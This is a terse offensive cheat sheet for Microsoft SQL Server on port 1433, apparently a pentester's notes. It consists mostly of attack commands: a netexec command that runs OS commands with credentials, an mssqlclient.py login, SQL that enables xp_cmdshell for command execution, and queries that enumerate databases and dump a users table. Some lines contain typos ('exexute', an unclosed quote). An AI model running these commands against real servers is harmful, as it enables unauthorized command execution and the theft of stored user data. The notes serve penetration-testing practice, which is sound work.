MSSQL <tcp 1433>

netexec mssql 10.10.10.101 -d domain -u adot8 -p password -x "whoami"

mssqlclient.py -p 1433 domain.local/adot8:[email protected] -windows-auth

sp_configure 'show advanced options', '1';
RECONFIGURE;
sp_configure 'xp_cmdshell', '1';
RECONFIGURE;
xp_cmdshell 'whoami;

exexute sp_configure 'show advanced options', '1';
RECONFIGURE;
exexute sp_configure 'xp_cmdshell', '1';
RECONFIGURE;
exexute xp_cmdshell 'whoami;

select @@version;
SELECT name FROM sys.databases;
SELECT name FROM master..sysdatabases;
USE adot8;
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
SELECT name FROM <databaseName>..sysobjects WHERE xtype = 'U';    <-- find users table
select * from <databaseName>.dbo.users;
select * from <databaseName>..users;